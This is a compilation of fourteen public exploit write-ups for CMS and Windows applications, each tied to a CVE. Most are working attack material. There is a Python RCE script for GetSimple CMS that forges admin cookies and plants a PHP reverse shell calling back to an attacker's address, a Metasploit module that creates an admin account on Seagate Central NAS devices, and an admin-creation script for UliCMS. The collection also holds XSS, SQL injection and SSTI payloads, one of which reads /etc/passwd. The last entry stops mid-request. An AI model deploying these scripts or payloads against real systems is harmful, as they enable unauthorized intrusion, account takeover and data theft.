



  1. # Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE) # Data: 18/5/2023 # Exploit Author : Youssef Muhammad # Vendor: Get-simple # Software Link: # Version app: 3.3.16 # Tested on: linux # CVE: CVE-2022-41544 import sys import hashlib import re import requests from xml.etree import ElementTree from threading import Thread import telnetlib purple = "\033[0;35m" reset = "\033[0m" yellow = "\033[93m" blue = "\033[34m" red = "\033[0;31m" def print_the_banner(): print(purple + ''' CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4 C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4 C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444 C V V E 2 00 0 2 2 4 11 5 4 4 CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4 '''+ reset) def get_version(target, path): r = requests.get(f"http://{target}{path}admin/index.php") match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text) if match: version = match.group(1) if version <= "3.3.16": print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544") else: print ("This is not vulnrable to this CVE") return version return None def api_leak(target, path): r = requests.get(f"http://{target}{path}data/other/authorization.xml") if r.ok: tree = ElementTree.fromstring(r.content) apikey = tree[0].text print(f"[+] apikey obtained {apikey}") return apikey return None def set_cookies(username, version, apikey): cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest() cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest() cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}" headers = { 'Content-Type':'application/x-www-form-urlencoded', 'Cookie': cookies } return headers def get_csrf_token(target, path, headers): r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers) m = re.search('nonce" type="hidden" value="(.*)"', r.text) if m: print("[+] csrf token obtained") return m.group(1) return None def upload_shell(target, path, 
headers, nonce, shell_content): upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true" payload = { 'content': shell_content, 'edited_file': '../shell.php', 'nonce': nonce, 'submitsave': 1 } try: response = requests.post(upload_url, headers=headers, data=payload) if response.status_code == 200: print("[+] Shell uploaded successfully!") else: print("(-) Shell upload failed!") except requests.exceptions.RequestException as e: print("(-) An error occurred while uploading the shell:", e) def shell_trigger(target, path): url = f"http://{target}{path}/shell.php" try: response = requests.get(url) if response.status_code == 200: print("[+] Webshell trigged successfully!") else: print("(-) Failed to visit the page!") except requests.exceptions.RequestException as e: print("(-) An error occurred while visiting the page:", e) def main(): if len(sys.argv) != 5: print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>") return target = sys.argv[1] path = sys.argv[2] if not path.endswith('/'): path += '/' ip, port = sys.argv[3].split(':') username = sys.argv[4] shell_content = f"""<?php $ip = '{ip}'; $port = {port}; $sock = fsockopen($ip, $port); $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes); """ version = get_version(target, path) if not version: print("(-) could not get version") return apikey = api_leak(target, path) if not apikey: print("(-) could not get apikey") return headers = set_cookies(username, version, apikey) nonce = get_csrf_token(target, path, headers) if not nonce: print("(-) could not get nonce") return upload_shell(target, path, headers, nonce, shell_content) shell_trigger(target, path) if __name__ == '__main__': print_the_banner() main()
  2. # Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2023-04-15 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.bludit.com/ # Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1 # Version: 3.14.1 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-31698 SVG Payload ------------- <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script type="text/javascript"> alert(document.domain); </script> </svg> save this SVG file xss.svg Steps to Reproduce: 1. At first login your admin panel. 2. then go to settings and click the logo section. 3. Now upload xss.svg file so your request data will be POST /bludit/admin/ajax/logo-upload HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Content-Type: multipart/form-data; boundary=---------------------------15560729415644048492005010998 Referer: http://127.0.0.1/bludit/admin/settings Cookie: BLUDITREMEMBERUSERNAME=admin; BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985; BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i Content-Length: 651 -----------------------------15560729415644048492005010998 Content-Disposition: form-data; name="tokenCSRF" 626c201693546f472cdfc11bed0938aab8c6e480 -----------------------------15560729415644048492005010998 Content-Disposition: form-data; name="inputFile"; filename="xss.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script 
type="text/javascript"> alert(document.domain); </script> </svg> -----------------------------15560729415644048492005010998-- 4. Now open the link of the logo image you uploaded. The XSS pop-up appears.
  3. # Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) # Date: 2023-04-17 # Exploit Author: Rahad Chowdhury # Vendor Homepage: http://churchcrm.io/ # Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4 # Version: 4.5.4 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-31699 Steps to Reproduce: 1. First, log in to the admin panel. 2. Then click the "Admin" menu and click "CSV Import"; the CSV file uploader option appears. 3. Insert the XSS payload into a JPG file's metadata (using exiftool or via the image's properties), then upload the JPG file. 4. The XSS pop-up appears.
  4. # Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) # Date: 2023-02-02 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://civicrm.org # Software Link: https://civicrm.org/download # Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier) # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70) # CVE: CVE-2023-25440 Vendor Security Advisory: CIVI-SA-2023-05 Description: A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows an attacker to execute arbitrary web scripts or HTML. Persistent JavaScript injected into the first/second name field of the "Add Contact" function while creating a contact is triggered once the page loads. Steps to reproduce: - Quick Add a contact to CiviCRM, - Insert a PoC payload inside the field(s), - Click on 'Add contact'. When a user visits the dashboard, including the "Recently added" box, the JavaScript code is rendered.
  5. # Exploit Title: MobileTrans 4.0.11 - Weak Service Privilege Escalation # Date: 20 May 2023 # Exploit Author: Thurein Soe # Vendor Homepage: https://mobiletrans.wondershare.com/ # Software Link: https://mega.nz/file/0Et0ybRS#l69LRlvwrwmqDfPGKl_HaJ5LmbeKJu_wH0xYKD8nSVg # Version: MobileTrans version 4.0.11 # Tested on: Windows 10 (Version 10.0.19045.2965) # CVE : CVE-2023-31748 Vulnerability Description: MobileTrans is marketed as the world's no. 1 mobile-to-mobile file transfer application. MobileTrans version 4.0.11 suffers from a weak service permission vulnerability that allows a normal Windows user to elevate to local administrator. A service named "ElevationService" is installed together with MobileTrans version 4.0.11 on the Windows operating system. Because "ElevationService" runs with SYSTEM privileges (SERVICE_START_NAME: LocalSystem) and its executable grants Everyone Full control (see the cacls output below), a local user can elevate to local administrator by modifying the service or replacing the affected executable. C:\Users\HninKayThayar\Desktop>sc qc ElevationService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ElevationService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service help DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe" C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Everyone:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
  6. # Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) # Date: 2023-05-24 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.squarepiginteractive.com # Software Link: https://www.fusioninvoice.com/store # Version: 2023-1.0 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50) # CVE: CVE-2023-25439 Description: A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows an attacker to execute arbitrary web scripts or HTML. Persistent JavaScript injected into the title and/or description while creating a task/expense/project (and possibly other objects) is triggered once the page loads. Steps to reproduce: - Click on "Expenses" or "Tasks" and add one (or edit an existing one), - Insert a PoC payload inside a field, for example the "Phone number" (or "Description") field, - Click on 'Save'. When the website dashboard, or the customer or project summary page, is visited, the JavaScript code is executed. PoC Screenshots: https://imagebin.ca/v/7FOZfztkDs3I
  7. # Exploit Title: Service Provider Management System v1.0 - SQL Injection # Date: 2023-05-23 # Exploit Author: Ashik Kunjumon # Vendor Homepage: https://www.sourcecodester.com/users/lewa # Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html # Version: 1.0 # Tested on: Windows/Linux 1. Description: Service Provider Management System v1.0 allows SQL Injection via ID parameter in /php-spms/?page=services/view&id=2 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit the latest vulnerabilities in the underlying database. Endpoint: /php-spms/?page=services/view&id=2 Vulnerable parameter: id (GET) 2. Proof of Concept: ---------------------- Step 1 - By visiting the url: http://localhost/php-spms/?page=services/view&id=2 just add single quote to verify the SQL Injection. Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2" -p id --dbms=mysql SQLMap Response: ---------------------- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=services/view&id=1' AND (SELECT 1072 FROM (SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT
  8. # Exploit Title: Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation # Date: 20 May 2023 # Exploit Author: Thurein Soe # Vendor Homepage: https://filmora.wondershare.com # Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE # Version: Filmora 12 ( Build 1.0.0.7) # Tested on: Windows 10 (Version 10.0.19045.2965) # CVE : CVE-2023-31747 Vulnerability description: Filmora is professional video editing software. Wondershare NativePush Build 1.0.0.7 is part of Filmora 12 (Build 12.2.1.2088) and is installed together with Filmora 12. The service "NativePushService" is vulnerable to an unquoted service path: its BINARY_PATH_NAME contains spaces and is not quoted, it runs with SYSTEM privileges (SERVICE_START_NAME: LocalSystem), and the local user has write access to the directory where the service executable is located (the cacls output below grants BUILTIN\Users Full control), which leads to full local privilege escalation on the affected Windows operating system. Effectively, the local user can elevate to local administrator by replacing the affected executable. C:\sc qc NativePushService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NativePushService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Native Push Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe" C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F HNINKAYTHAYAR\HninKayThayar:(ID)F
  9. Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS) Version: 1.6.1 Bugs: XSS Technology: PHP Vendor URL: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 Date of found: 03-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== ###XSS-1### steps: 1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/) 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1 Host: localhost Content-Length: 976 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-platform: "Linux" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtO Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167 Connection: close ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; 
name="reqid" 187de34ea92ac ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="cmd" upload ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="target" l1_Lw ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="mtime[]" 1683056102 ------WebKitFormBoundary5u4r3pOGl4EnuBtO-- 3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg) ======================================================================================================================== ###XSS-2### 1. go to pages (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages) 2. add page 3. 
write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E) payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3E poc request: POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1 Host: localhost Content-Length: 143 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475 Connection: close page_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save 4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php
  10. Exploit Title: Zenphoto 1.6 - Multiple stored XSS Application: Zenphoto-1.6 xss poc Version: 1.6 Bugs: XSS Technology: PHP Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/ Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip Date of found: 01-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== ###XSS-1### steps: 1. Create a new album. 2. Set the Album Description to: <iframe src="https://14.rs"></iframe> 3. Save and view the album at http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/ ===================================================== ###XSS-2### steps: 1. Go to the user account page and change the user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users). 2. Change the postal code to <script>alert(4)</script> 3. If the admin user information is rendered as HTML, the XSS triggers. poc video : https://youtu.be/JKdC980ZbLY
  11. #Exploit Title: Ulicms 2023.1 - create admin user via mass assignment #Application: Ulicms #Version: 2023.1-sniffing-vicuna #Bugs: create admin user via mass assignment #Technology: PHP #Vendor URL: https://en.ulicms.de/ #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip #Date of found: 04-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna import requests new_name=input("name: ") new_email=input("email: ") new_pass=input("password: ") url = "http://localhost/dist/admin/index.php" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language=" response = requests.post(url, headers=headers, data=data) if response.status_code == 200: print("Request is success and created new admin account") else: print("Request is failure.!!") #POC video : https://youtu.be/SCkRJzJ0FVk
  12. ## # Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit) # Date: Dec 9 2019 # Exploit Author: Ege Balci # Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/ # Version: 2015.0916 # CVE : 2020-6627 # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'net/http' require 'net/ssh' require 'net/ssh/command_stream' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::SSH def initialize(info={}) super(update_info(info, 'Name' => "Seagate Central External NAS Arbitrary User Creation", 'Description' => %q{ This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device. Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state and register a new admin user which is capable of SSH access. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Ege Balcı <[email protected]>' # author & msf module ], 'References' => [ ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'], ['CVE', '2020-6627'] ], 'DefaultOptions' => { 'SSL' => false, 'WfsDelay' => 5, }, 'Platform' => ['unix'], 'Arch' => [ARCH_CMD], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, 'Targets' => [ ['Auto', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ], ], 'Privileged' => true, 'DisclosureDate' => "Dec 9 2019", 'DefaultTarget' => 0 )) register_options( [ OptString.new('USER', [ true, 'Seagate Central SSH user', '']), OptString.new('PASS', [ true, 'Seagate Central SSH user password', '']) ], self.class ) register_advanced_options( [ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"), 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' } },60) if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916') Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit # First get current state first_state=get_state() if first_state print_status("Current device state: #{first_state['state']}") else return end if first_state['state'] != 'start' # Set new start state first_state['state'] = 'start' res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'), 'ctype' => 'application/x-www-form-urlencoded', 'data' => "info=#{first_state.to_json}" },60) changed_state=get_state() if changed_state && changed_state['state'] == 'start' print_good("State successfully changed !") else print_error("Could not change device state") return end end name = Rex::Text.rand_name_male user = 
datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}" pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8) print_status('Creating new admin user...') print_status("User: #{user}") print_status("Pass: #{pass}") # Add new admin user res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"), 'ctype' => 'application/x-www-form-urlencoded', 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' }, 'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1} },60) conn = do_login(user,pass) if conn print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})") handler(conn.lsock) end end def do_login(user, pass) factory = ssh_socket_factory opts = { :auth_methods => ['password', 'keyboard-interactive'], :port => 22, :use_agent => false, :config => false, :password => pass, :proxy => factory, :non_interactive => true, :verify_host_key => :never } opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end rescue Rex::ConnectionError fail_with Failure::Unreachable, 'Connection failed' rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end if ssh conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end return nil end def get_state res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"), 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' } },60) if res && (res.code == 200 
||res.code == 100) return res.get_json_document end res = nil end end
  13. #!/usr/bin/python3 # Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated) # Google Dork: intitle:"SCM Manager" intext:1.60 # Date: 05-25-2023 # Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829) # Vendor Homepage: https://scm-manager.org/ # Software Link: https://scm-manager.org/docs/1.x/en/getting-started/ # Version: 1.2 <= 1.60 # Tested on: Debian based # CVE: CVE-2023-33829 # Modules import requests import argparse import sys # Main menu parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit') parser.add_argument("-u", "--user", help="Admin user or user with write permissions") parser.add_argument("-p", "--password", help="password of the user") args = parser.parse_args() # Credentials user = sys.argv[2] password = sys.argv[4] # Global Variables main_url = "http://localhost:8080/scm" # Change URL if its necessary auth_url = main_url + "/api/rest/authentication/login.json" users = main_url + "/api/rest/users.json" groups = main_url + "/api/rest/groups.json" repos = main_url + "/api/rest/repositories.json" # Create a session session = requests.Session() # Credentials to send post_data={ 'username': user, # change if you have any other user with write permissions 'password': password # change if you have any other user with write permissions } r = session.post(auth_url, data=post_data) if r.status_code == 200: print("[+] Authentication successfully") else: print("[-] Failed to authenticate") sys.exit(1) new_user={ "name": "newUser", "displayName": "<img src=x onerror=alert('XSS')>", "mail": "", "password": "", "admin": False, "active": True, "type": "xml" } create_user = session.post(users, json=new_user) print("[+] User with XSS Payload created") new_group={ "name": "newGroup", "description": "<img src=x onerror=alert('XSS')>", "type": "xml" } create_group = session.post(groups, json=new_group) print("[+] Group with XSS Payload created") new_repo={ "name": "newRepo", "type": "svn", "contact": "", 
"description": "<img src=x onerror=alert('XSS')>", "public": False } create_repo = session.post(repos, json=new_repo) print("[+] Repository with XSS Payload created")
  14. Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI) Exploit Author: PARAG BAGUL CVE: CVE-2023-30145 ## Description Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the formats parameter. ## Affected Component All versions below 2.7.0 are affected. ## Author Parag Bagul ## Steps to Reproduce 1. Open the target URL: `https://target.com/admin/media/upload` 2. Upload any file and intercept the request. 3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`. 4. Check the response. It should return the result of 7*7, i.e. 49, in the message "File format not allowed (dqopi49vuuvm)". ##Detection: #Request: POST /admin/media/upload?actions=false HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target.com/admin/profile/edit X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------327175120238370517612522354688 Content-Length: 1200 Origin: http://target.com DNT: 1 Connection: close Cookie: cookie -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="file_upload"; filename="test.txt" Content-Type: text/plain test -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="versions" -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="thumb_size" -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="formats" test<%= 7*7 %>test -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="media_formats" image -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="dimension" -----------------------------327175120238370517612522354688 
Content-Disposition: form-data; name="private" -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="folder" / -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="skip_auto_crop" true -----------------------------327175120238370517612522354688-- #Response: HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK Cache-Control: max-age=0, private, must-revalidate Set-Cookie: cookie Content-Length: 41 File format not allowed (test49test) #Exploitation: To execute a command, add the following payload: testqopi<%= File.open('/etc/passwd').read %>fdtest Request: POST /admin/media/upload?actions=true HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target.com/admin/media X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------104219633614133026962934729021 Content-Length: 1237 Origin: http://target.com DNT: 1 Connection: close Cookie: cookie -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="file_upload"; filename="test.txt" Content-Type: text/plain test -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="versions" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="thumb_size" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="formats" dqopi<%= File.open('/etc/passwd').read %>fdfdsf -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="media_formats" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="dimension" -----------------------------104219633614133026962934729021 
